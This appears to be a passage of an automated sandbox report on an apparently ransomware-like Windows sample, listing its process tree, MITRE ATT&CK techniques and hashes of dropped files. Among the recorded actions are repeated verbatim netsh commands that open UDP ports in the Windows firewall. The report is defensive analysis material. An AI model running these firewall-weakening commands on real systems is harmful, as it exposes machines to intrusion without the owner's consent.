    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1668
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2168
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:4200
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4688
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2332
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:3588
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2816
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2260
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2068
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:1732
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3368
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3932
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:1108
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2700
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3184
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2584
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4176
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2292
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2460
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2380
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:912
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3236
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2068
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3104
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:3676
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4652
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2352
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3164
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1388
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3764
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2680
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1144
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:2024
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:4264
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4652
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1328
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:4276
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4852
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3960
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4660
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4268
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:2720
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4432
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4996
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4196
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4672
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2188
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4640
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2660
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2952
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3324
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4644
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4944
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1168
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3124
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3092
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3148
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:344
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4048
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4980
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3572
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1740
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3344
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:4884
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:228
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:248
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2152
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1132
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3572
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:1632
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2976
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:564
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2672
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3684
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3584
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4680
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3224
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3312
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:5060
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\loveletter.vbs"
  2⤵
  PID:3672
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\mail.vbs"
  2⤵
  PID:2568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:4760
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:4336

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:5100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:1664

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
PID:1464

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\srchadmin.dll ,
1⤵
PID:2980

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
PID:4668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:4200

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38a6055 /state1:0x41c64e6d
1⤵
PID:3976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Network Share Discovery

T1135

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Time Discovery

T1124

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
4ef3b165311abe48029443c0a529747f

SHA1
ad65cc913ed3805d813bc16337c7f6d2a97b55d9

SHA256
c2c563dddc3df7fda0e246d9988718b315a9704335312d5ddfb1768efa1655ff

SHA512
696e3deb942e4f6d3980a831668bfd40a8bee586cca3e4ca5a85aeae482af5c8c5ae21e319b4483345c582b7a61d51220c8ccce0072497a8ee53e1e87ac5e99a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
06749aaa06f6c7945179a4d6987646df

SHA1
e9a085d7066b30cb8b3f252e18a430f2651e641c

SHA256
f2834fd2d110fae3fc504311522554154af4e9a1bdf96b20836983ce04135b7f

SHA512
eba3862fdf9f835398862e511e4acf5f48f4c1f6fa42a96be4012fe968ee2d3b60eb3ee50760d2d0d0c89dfcc1212c5b1dd35fc140069405e39ecba23bb94047

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1003ec7951f3cd028cf121961d35d74f

SHA1
c4d16f56c324c66b7f190bfc81504741f9583496

SHA256
a0c7e18c72dfe1dd512a208cf1ed2db19116aa95e9e7daab8a008365cd445659

SHA512
d97505b38b2e556874341d3695ef0473ab86aa4468df5fe999aa64c91bfcb8d5bf80191eb75b3af6cafc7835ac5b648fbb511aeccb5b555eb54f72dcb276fe26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
caf7c8d742be571cc9df52e5fed42eac

SHA1
6022d6909c68bccce19eeedd6b95b4c74a4eaffb

SHA256
907d59c4a1decc4fcdd1a2614e3884392d7c275f82cc900fe742151b9c9be22c

SHA512
9e8f1a4c2b44b8222f5a31e750ca8fa7f0a4fa6a961c03c0ba8746bc3a8b5cdf08ee91fbc607876b7b2e9ea52562dd55a92d488e4b352f930a4214d5fec8be4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
73cfb6b874e580b592e2359c08ee0cad

SHA1
0d725f149b045d17af78799db668c77665c2c267

SHA256
3c1bc34be635363731af91ade6426d1c6753b8fc6beeb77fe2a1d09e9dc2871a

SHA512
1c48dcd0f3cbc6199ae511cf965fe3d05447d0d772cc5c97adfb6deac897788738c197533986163567eca714680f3761dfe1de045f4e3a5043d1262405ff1101

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\ef75e738-cfc5-440e-8855-345fafcb16dd.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kkid5uua.3kt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\22251equest.xml16095.cyn

Filesize
7B

MD5
795fc94569ac1e81adcc0b210d697fac

SHA1
f24e96080686bbeda4f7c2e144d30fef0570ca00

SHA256
b966109dc05aef186be134969b24baf913df103280a1f9cd34f858d75fe26e2d

SHA512
d22e3c8ec7eec35b3b9141bac6940debd08dc28a43cee7f42beacc13564578ad248d662e1b610a8a72462c0b69c4684b1d464b073b720828bafdd528cdd34fdd

Download Submit
C:\Users\Admin\Desktop\YcynNote.txt

Filesize
468B

MD5
543df538bfe2cdb507cbd92c7e4bc598

SHA1
a0f3e8ceffa1ff3b5ad9a1b6c2d65d540f2fb54a

SHA256
717585ea06e86f43f028a1235c8232c73e2f6fcf241a1df110b75c465271c5f2

SHA512
f8c1d932a1799feb07c5d5e97cb365e03dbf17376b62588e5c1bf5c7a70a3102dca536f081a374aec9e62054880f7239bb25c8ac70cff54d63b12029bc131437

Download Submit
C:\Users\Admin\Documents\4189ctPush.dotm21655.cyn

Filesize
7B

MD5
e210738007a0fdcc9b54fd47cf3d2468

SHA1
03fc4f6a8f9f665f5fc3d571a82ba0b68c557a3f

SHA256
188a22ee45f76b6cd6b45e8e76b22a26ee20cee384a9aec7ce2288df9c12e53a

SHA512
334bfec17a44686c834c56351e7f2141391e3369c96abd3540faec1af3ad529dd2baf6fdd868e4754e4788b927ccc597d0a175355f0dd2794fc288d8e53a6c75

Download Submit
C:\Users\Admin\Documents\black.bat

Filesize
71B

MD5
3544e4b7ac1418d34061648a9f3e3dc6

SHA1
30e88f4aa1cc6c936c9c274f9f4f53b491a4d8ce

SHA256
db24f2b49b88e4cf7c3569a067f3e6e325d54a3be2368262d37a6a34f4f8aae8

SHA512
5d3048b421b4900efdce377d61f8965beb4bc02db27875c03eb378cd9996de9a01b63e54e99b4f94e4cf14e1b60d873d715ccea38fd0bdc1200ad3a2f268e126

Download Submit
C:\Users\Admin\Downloads\2b2crypt.cmd

Filesize
133B

MD5
e1aa6baebddf0aff6c4c5083a20a297e

SHA1
28815535556ca05f3d7f3d226df8cd5c85fa89c9

SHA256
d4a7360c572d83e11868d807b02857f84086abd381ffa2e6aff95a1dda490a9e

SHA512
62aeaf0f676f5966b90093397e53288ec7b8ccb08b8b29aa8fe47259b683fe29f945c7425605befaf6bea853ec787cbfb9c8ec27880aa3e10290c9df88d79190

Download Submit
C:\Users\Admin\Downloads\2b2crypt.m.cmd

Filesize
137B

MD5
147a38541c3845f2d0a53b18f738eec1

SHA1
12775ede4d1765164ff685dfdc9a51d8c66c2400

SHA256
d6a767002915d5c756b8b39a9db54fbaa4fbedf75a444ec2db810d9468c47f7b

SHA512
a448da5bea8d47caba326bc54722459504e24469e07e5cac501d435465a9aedb6da12cc9a71a8de4d2915e1348715766fa95b7ef077e403f29ccb6c35f879de0

Download Submit
C:\Users\Admin\Downloads\6648chLimit.docx22514.cyn

Filesize
8B

MD5
b94c209cf38063d20d63dc09f2ae873d

SHA1
96ef8ac562766a5fc3de84096f35bf977a1d1e5f

SHA256
0e71573bb7f2805bc0e30cbbe46e36d3982363ecfeb55a3d411e6d43fa6fd591

SHA512
2a72533df58ecde49edca2a5f52ebc850188c503e2e7bbe1781d415d2659f1f2d367486010c728a0de5af9c62b275aa2d89474274dcdc7a058c6b871723dfa62

Download Submit
C:\Users\Admin\FuckPorts.cmd

Filesize
359B

MD5
2fdfd20af32c8dc255909ebcd44ed51b

SHA1
5081d65b5e2001605dd83fc936077eb7f4786724

SHA256
0de397da60dd5442348a162261f29d91a93c5b10871d88484813645ada985b57

SHA512
65493c00f83a1e5e67bce8297cc546e7b03d2476570d13ba90063813b08eaec0837513093787126beb3dc2c0be54100f6a9f05731ec0a6e664c83f567f8e7d39

Download Submit
C:\Users\Admin\Music\14361en.reg10294.cyn

Filesize
8B

MD5
8cd502f5bf8dc075d41a0d5be175a3e1

SHA1
d4f720a38e935be3e3ce15a427b608ff1f80331d

SHA256
37ac4f931651b5deb0a5340d0ee6174fbd606b048ccd6261fe5784c8669d30f4

SHA512
877234cc3aed07a6bcac355af1a69a7c0fec7fd751376357cfeac2c1b6360d5349a65f0d427f2eb7defa6370785e262fdd114c7bbb1e6e9453770f1bee480add

Download Submit
C:\Users\Admin\Pictures\360Hide.dxf9807.cyn

Filesize
8B

MD5
190ee356c0ed5c948cf248dbdd8af6bd

SHA1
808ac5f7755bb374cba429217097c47250ba315a

SHA256
bef70885d9ff36b8490dde2c214bcf9d5bf4631e9bdf69bea5334f89eb72d773

SHA512
365c02f05504597dab4bd4c557d510f64367efcbeadfc19847d35efbf425e39de544d10edd21fab91cced1445b61c3813ac5deca64699d7d246dbd7672a927a8

Download Submit
C:\Users\Admin\loveletter.vbs

Filesize
495B

MD5
900ead69492d80e48738921eca28b14f

SHA1
6b51607c54f8e734a7ea47091859c3e8dce6365c

SHA256
c1a49c4801603e877e673620c289d709c5c2b368dae72e941f9649889faefab3

SHA512
8fbb63ea9e5e2bca05bdbcf373056e58aaae2dfd180dfca2fdfdc2b706bb3923798f9878eddf7acef255676eda65f94cc9a827e8abcc9d4da6613f33d74861f2

Download Submit
C:\Users\Admin\mail.vbs

Filesize
488B

MD5
88ef4bc3f48eeb97aedadff8f3840980

SHA1
48e8167bef2562d902885a075f6190d269fd3d35

SHA256
b62346a7425cfec83d3f05fc4ff268510a16493479f09e7113169aaad5abeefa

SHA512
523127a83202c86445825e1d8ab84a268e4f9b40a7c76b91b4947fb29de1c0819ba3e856bc1cbd40d6b0d10c04ca356a5e0dc975708a3d765ab425ab1a7d1024

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2476-0-0x00007FFD53DF3000-0x00007FFD53DF5000-memory.dmp

Filesize
8KB

Download
memory/2476-1-0x000002D572EB0000-0x000002D572ED2000-memory.dmp

Filesize
136KB

Download
memory/4760-328-0x0000018A51D40000-0x0000018A51D58000-memory.dmp

Filesize
96KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads